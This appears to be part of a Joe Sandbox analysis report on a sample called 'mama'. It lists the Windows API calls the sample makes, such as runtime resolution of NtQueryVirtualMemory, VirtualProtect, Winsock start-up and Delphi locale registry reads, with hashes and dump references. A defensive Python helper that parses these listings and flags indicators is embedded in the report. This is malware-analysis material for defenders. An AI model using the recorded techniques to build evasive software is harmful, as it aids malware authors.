                                                                        • Runtime, timing and thread state: 3068a67 / 3068a7f / 3068ad9 / 3068b10 / 3068b3a GetTickCount; 306871d / 3068735 / 3068c68 / 306606c / 3066084 / 3066154 / 306616e / 3065748 / 3065762 / 3065a89 .. 3065c28 / 351a506 Sleep; 306873e SwitchToThread; 3069bc2 / 3068aae / 3068ebc / 3068ee4 / 30688bc GetCurrentThreadId; 307122d / 30711e8 TlsGetValue; 30711ea TlsSetValue; 3069afe / 3069b4b GetStdHandle, WriteFile; 3069c87 ExitProcess; 306971e UnhandledExceptionFilter; 307184c / 307193b / 3071a3a RaiseException; 3071918 / 3071a17 / 30687df GetLastError
                                                                        • COM/automation helpers: 306a303 SysReAllocStringLen; 3069ee6 SysFreeString; 320f1e2 / 320f25a VariantClear, VariantInit; 320fb2e / 320fbe7 VariantCopy

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,NtQueryVirtualMemory), ref: 0352535F
                                                                        • GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 03525365
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                        • API String ID: 2574300362-2623246514
                                                                        • Opcode ID: 2d39965ea88bc7677b37fbc7362da61d51d85a9e0132d17c50762583318e90b2
                                                                        • Instruction ID: 31232d9ea68e95ff76ac7a749dc1b8609aaa4ff32639b6096ec4593d15d427ed
                                                                        • Opcode Fuzzy Hash: 2d39965ea88bc7677b37fbc7362da61d51d85a9e0132d17c50762583318e90b2
                                                                        • Instruction Fuzzy Hash: 4401A77DA04744DFD300EFE9F442E8A7BA2A786210F104161DC005B7F9E7B16906BF49
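                                                                        The two API bullets above record the payload resolving NtQueryVirtualMemory from ntdll.dll at run time (LoadLibraryA followed by GetProcAddress) instead of importing it. The Python helper below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses "APIs" listings in the bullet format used on this page, pairs each LoadLibrary*/GetModuleHandle* call with the GetProcAddress that follows it, and flags a small indicator table. The sample inputs are copied from this page's listings; the indicator descriptions, the pairing heuristic and the choice to pool string arguments from both bullets (the sandbox's argument columns are stack snapshots, and here the export name appears on the LoadLibraryA bullet rather than on GetProcAddress) are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox "APIs" listings.

Added example, not part of the Joe Sandbox report or of the analysed sample.
It parses the bullet format used on this page, pairs LoadLibrary*/GetModuleHandle*
calls with the GetProcAddress that follows them, and flags a few indicators.
The INDICATORS descriptions and the pairing heuristic are this example's own."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet of an "APIs" listing, with or without the "Part of subcall function" prefix:
#   • GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 03525365
#     • Part of subcall function 0306E190: FindClose.KERNEL32(00000000,...), ref: 0306E1D3
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<dll>[A-Za-z0-9_]+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX_WORD = re.compile(r"^[0-9A-Fa-f]{8}$")  # raw stack dwords the sandbox could not resolve


@dataclass
class ApiCall:
    api: str
    dll: str
    args: List[str]
    ref: int                       # address of the call instruction
    subcall: Optional[int] = None  # callee address when the bullet came from a sub-function

    def literal_args(self) -> List[str]:
        """Arguments the sandbox resolved to text (drops '?' and raw hex dwords)."""
        return [a for a in self.args if a and a != "?" and not HEX_WORD.match(a)]


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse every API bullet in one listing; non-matching lines (headers, blanks) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args").strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("dll").upper(), args, int(m.group("ref"), 16), sub))
    return calls


def dynamic_resolution(calls: List[ApiCall]):
    """Pair each LoadLibrary*/GetModuleHandle* with the next GetProcAddress and return
    (library, [exports], ref). String arguments of both bullets are pooled because the
    sandbox's argument columns are stack snapshots: on this page the export name shows
    up on the LoadLibraryA bullet, not on GetProcAddress."""
    pairs, pending = [], None
    for c in calls:
        if c.api.startswith(("LoadLibrary", "GetModuleHandle")):
            pending = c
        elif c.api == "GetProcAddress" and pending is not None:
            strings = pending.literal_args() + c.literal_args()
            lib = next((s for s in strings if s.lower().endswith(".dll")), None)
            exports = sorted({s for s in strings if s != lib})
            pairs.append((lib, exports, c.ref))
            pending = None
    return pairs


# Indicator table: API names or string arguments worth a second look.
# Descriptions are this example's annotations, not report output.
INDICATORS = {
    "NtQueryVirtualMemory": "queries its own address space (memory-region and hook checks)",
    "VirtualProtect": "changes page protections (code unpacked or loaded at run time)",
    "WSAStartup": "initialises Winsock before any network activity",
    "RegisterServiceCtrlHandlerExW": "runs as a Windows service",
    "Software\\Embarcadero\\Locales": "Delphi RTL locale lookup (module built with Delphi)",
}


def flag_indicators(calls: List[ApiCall]) -> dict:
    """Map each INDICATORS key found among API names or resolved string arguments to its note."""
    hits = {}
    for c in calls:
        for token in [c.api] + c.literal_args():
            if token in INDICATORS:
                hits[token] = INDICATORS[token]
    return hits


# Sample inputs copied from the listings on this page.
SAMPLE_RESOLVER = r"""
APIs
• LoadLibraryA.KERNEL32(ntdll.dll,NtQueryVirtualMemory), ref: 0352535F
• GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 03525365
"""
SAMPLE_LOCALE = r"""
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0306DFD9,?,?), ref: 0306DDED
• RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9,?,?), ref: 0306DE36
"""
SAMPLE_SUBCALL = r"""
• GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0306E388,?,?), ref: 0306E2FA
  • Part of subcall function 0306E190: FindFirstFileW.KERNEL32(00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1C3
"""

if __name__ == "__main__":
    for name, block in [("resolver", SAMPLE_RESOLVER), ("locale", SAMPLE_LOCALE), ("subcall", SAMPLE_SUBCALL)]:
        calls = parse_api_block(block)
        print(name, [c.api for c in calls], dynamic_resolution(calls), flag_indicators(calls))
```

                                                                        Run on the resolver listing it reports ntdll.dll / NtQueryVirtualMemory resolved at 03525365; on the locale listing it reports no dynamic resolution but flags the Software\Embarcadero\Locales key, which is the Delphi runtime's locale override lookup. Paste further "APIs" blocks from the report into parse_api_block to extend the triage.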

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0306E388,?,?), ref: 0306E2FA
                                                                        • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0306E388,?,?), ref: 0306E303
                                                                          • Part of subcall function 0306E190: FindFirstFileW.KERNEL32(00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1C3
                                                                          • Part of subcall function 0306E190: FindClose.KERNEL32(00000000,00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                        • String ID:
                                                                        • API String ID: 3216391948-0
                                                                        • Opcode ID: c8bfeb9fa33be1eff1d15aa33a6501cde8aef95ed3608478855121e3afaacaa8
                                                                        • Instruction ID: 2c86b4d4d93546fb2f45c549ffa1cb00fddb435227fea7a6b35d8c1155b5022a
                                                                        • Opcode Fuzzy Hash: c8bfeb9fa33be1eff1d15aa33a6501cde8aef95ed3608478855121e3afaacaa8
                                                                        • Instruction Fuzzy Hash: 67117CB8A01309AFDF00EFA8C991AEEB3B8EFC9700F504475A515EB258EB345E04C665

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1C3
                                                                        • FindClose.KERNEL32(00000000,00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: f0883d755cc0294b935e3f81023ec95cd08d3f44d9b16a4e02e7b60f7b37d622
                                                                        • Instruction ID: ceced8b0d263924b6b92300d393cb570048c941f9f2d94b310bfdbd21c4033fd
                                                                        • Opcode Fuzzy Hash: f0883d755cc0294b935e3f81023ec95cd08d3f44d9b16a4e02e7b60f7b37d622
                                                                        • Instruction Fuzzy Hash: F3F0E279501308AFCB50FBB8CD018CEF3ECEB8921075104B0A814EF554EB309F00A510

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0306DFD9,?,?), ref: 0306DDED
                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9,?,?), ref: 0306DE36
                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9,?,?), ref: 0306DE58
                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0306DE76
                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0306DE94
                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0306DEB2
                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0306DED0
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9), ref: 0306DF10
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0306DFBC,?,80000001), ref: 0306DF3B
                                                                        • RegCloseKey.ADVAPI32(?,0306DFC3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales), ref: 0306DFB6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Open$QueryValue$CloseFileModuleName
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                        • API String ID: 2701450724-3496071916
                                                                        • Opcode ID: 211ca52f47dc4ec897c2b11afb45bc54f9e2f94dc2bfaac22720fddb375f45d2
                                                                        • Instruction ID: a91efb78e4dd6bdceb848bf02f561d009293aa1cfeb3f7e14c3c977b20c880b8
                                                                        • Opcode Fuzzy Hash: 211ca52f47dc4ec897c2b11afb45bc54f9e2f94dc2bfaac22720fddb375f45d2
                                                                        • Instruction Fuzzy Hash: A4512179B4230DBEEB10EBA4CC41FEEB3FCEB49704F500465B614EE189D6B09A44CA55

                                                                        Control-flow Graph

                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16431121b66bb3c322968f6bf971755ea3c14520ca77e1cb8e21446998f78478
                                                                        • Instruction ID: 4a25fcaf3b9219ef1d9a6dc83e5214a6d058e8b93bb1878a4a5eba8de1bba02a
                                                                        • Opcode Fuzzy Hash: 16431121b66bb3c322968f6bf971755ea3c14520ca77e1cb8e21446998f78478
                                                                        • Instruction Fuzzy Hash: E6C147667127050BE714EA7CDC847AEB3C69BC6221F1C863EE255CF39DDB69C8468390

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 03065A8B
                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 03065AA1
                                                                        • Sleep.KERNEL32(00000000), ref: 03065ACF
                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 03065AE5
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 3ceed13b106fcb9c1e1cb2d1f39044aa8a8a8f284debf55012c2d78dace474ee
                                                                        • Instruction ID: 4912dfbe3cc2985c2368e6c38752ddd87d06c85a620f3599af222fc22affa757
                                                                        • Opcode Fuzzy Hash: 3ceed13b106fcb9c1e1cb2d1f39044aa8a8a8f284debf55012c2d78dace474ee
                                                                        • Instruction Fuzzy Hash: 5AC104726023518FD715DF29EC84B5AFBE1AB87320F0982AED4558F39DC7B0944ADB90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,00000000,0320BFD3), ref: 0320BFB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID: VirtualProtect
                                                                        • API String ID: 544645111-268857135
                                                                        • Opcode ID: ca7d951ca20a774dbee64007f029b1dff9fc992e1e1d5eff2c5cb1d3f3e7a045
                                                                        • Instruction ID: f3abac9d2ee640e674b8f45ad2768de501e9b6f81237b691fc675eb6c68ecaf1
                                                                        • Opcode Fuzzy Hash: ca7d951ca20a774dbee64007f029b1dff9fc992e1e1d5eff2c5cb1d3f3e7a045
                                                                        • Instruction Fuzzy Hash: 54F08C79614308AFCB10EFA8D854C9EBBE9EB48210F504060F914D7781D730DA448F95

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetUserDefaultUILanguage.KERNEL32(00000000,0306E4AB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0306E532,00000000,?,00000105), ref: 0306E43F
                                                                        • GetSystemDefaultUILanguage.KERNEL32(00000000,0306E4AB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0306E532,00000000,?,00000105), ref: 0306E467
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DefaultLanguage$SystemUser
                                                                        • String ID:
                                                                        • API String ID: 384301227-0
                                                                        • Opcode ID: e24a9e4800e255cc257e98d26a5f6b1cdccba008f318192357708c3d19ed4982
                                                                        • Instruction ID: 585e3c8929935f0ff04e23f84141e827eee87bfa0e9e1b2fa9c11700c730a71a
                                                                        • Opcode Fuzzy Hash: e24a9e4800e255cc257e98d26a5f6b1cdccba008f318192357708c3d19ed4982
                                                                        • Instruction Fuzzy Hash: E931413CA063199FDF10EBA8C980AEEB7F9EF84300F504865D411ABA58D774AD85CB91

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0306E572,?,00400000,0355EC1C,?,0306D270,00400000,?,0000020A,00400000,0355EC1C,0306D2B0), ref: 0306E4F4
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0306E572,?,00400000,0355EC1C,?,0306D270,00400000,?,0000020A), ref: 0306E545
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileLibraryLoadModuleName
                                                                        • String ID:
                                                                        • API String ID: 1159719554-0
                                                                        • Opcode ID: ee6b0b15198ab750789f166b6e3754236cf1bf3cc6c957101fff22b1fff0303c
                                                                        • Instruction ID: 7ab972060c143d0c3624f4829024c42041d964912d048e65f960094a63cd5f6c
                                                                        • Opcode Fuzzy Hash: ee6b0b15198ab750789f166b6e3754236cf1bf3cc6c957101fff22b1fff0303c
                                                                        • Instruction Fuzzy Hash: 6111A079A4131C9FDB10EB64CD95FDEB3B8EB84300F5140A5A408AB294EB705F84CEA1

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000101,?), ref: 03549249
                                                                        • GetLastError.KERNEL32(?,03550B4F,00000000,03550EDA), ref: 0354924E
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastStartup
                                                                        • String ID:
                                                                        • API String ID: 1235836516-0
                                                                        • Opcode ID: d0ae1a61364f19c51dbc86b56a314533f706d8ca4255612c41436a9af4e94cd5
                                                                        • Instruction ID: 6c5d0a955023aa5d582cdd31cb360fb0040dbd7ce40b7a955774e570a0fab335
                                                                        • Opcode Fuzzy Hash: d0ae1a61364f19c51dbc86b56a314533f706d8ca4255612c41436a9af4e94cd5
                                                                        • Instruction Fuzzy Hash: CDC08074D5130C5BDB50FAD85C029DAB35C8740300F0002E55D0CCA242FDF11A5006E7

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateThread.KERNEL32(?,?,03069D20,00000000,?,?), ref: 03069DB2
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: fce79f515696b971b3f1eca12a16fa3481a13cdfdcd4e9cd39615ad241fb763a
                                                                        • Instruction ID: fc92117646d861a80d1d5bf1dbf2530b4d1dbc8404ff99541096771dc763ba8d
                                                                        • Opcode Fuzzy Hash: fce79f515696b971b3f1eca12a16fa3481a13cdfdcd4e9cd39615ad241fb763a
                                                                        • Instruction Fuzzy Hash: B8018F72B06218AFCB40DB9DD880B8EB7ECEB49260F044066F508DB395D6719D00C7A0

                                                                        Control-flow Graph (image; legend: Executed / Not Executed)
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00400000,?,0000020A,00400000,0355EC1C,0306D2B0,?,?,030700C0), ref: 0306D262
                                                                          • Part of subcall function 0306E4B8: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0306E572,?,00400000,0355EC1C,?,0306D270,00400000,?,0000020A,00400000,0355EC1C,0306D2B0), ref: 0306E4F4
                                                                          • Part of subcall function 0306E4B8: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0306E572,?,00400000,0355EC1C,?,0306D270,00400000,?,0000020A), ref: 0306E545
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileModuleName$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 4113206344-0
                                                                        • Opcode ID: 7c1ee64858cc89b131c1bcaaf4c5d23a408bec5d341bc7def07cd761b0403ce4
                                                                        • Instruction ID: a97e9d345890bfc99c1be1f8da11b65732ab28d11e9315335755e8aa9bbbf09a
                                                                        • Opcode Fuzzy Hash: 7c1ee64858cc89b131c1bcaaf4c5d23a408bec5d341bc7def07cd761b0403ce4
                                                                        • Instruction Fuzzy Hash: AFE06DB5A013108BCF10DF6CC8C0A4733E8AF18650F040690EC18CF34AD370C91087E1

                                                                        Control-flow Graph (image; legend: Executed / Not Executed)
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,03065CCF), ref: 030656CF
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 6ff7d5f6f16dfbc1f6206a0884aaaf3665a6b726a22c5bb8610cfb6221ad09cb
                                                                        • Instruction ID: eaad7e2e2fd1982acc94f8cdabd8700dda8572f76912ab4134fb50d27284879c
                                                                        • Opcode Fuzzy Hash: 6ff7d5f6f16dfbc1f6206a0884aaaf3665a6b726a22c5bb8610cfb6221ad09cb
                                                                        • Instruction Fuzzy Hash: 0CF08CF2B013114BE714EF78A940B42BBD4A745350F12413EE909EB798D7B088069784
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9), ref: 0306DBE1
                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0306DBF2
                                                                        • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?), ref: 0306DCF2
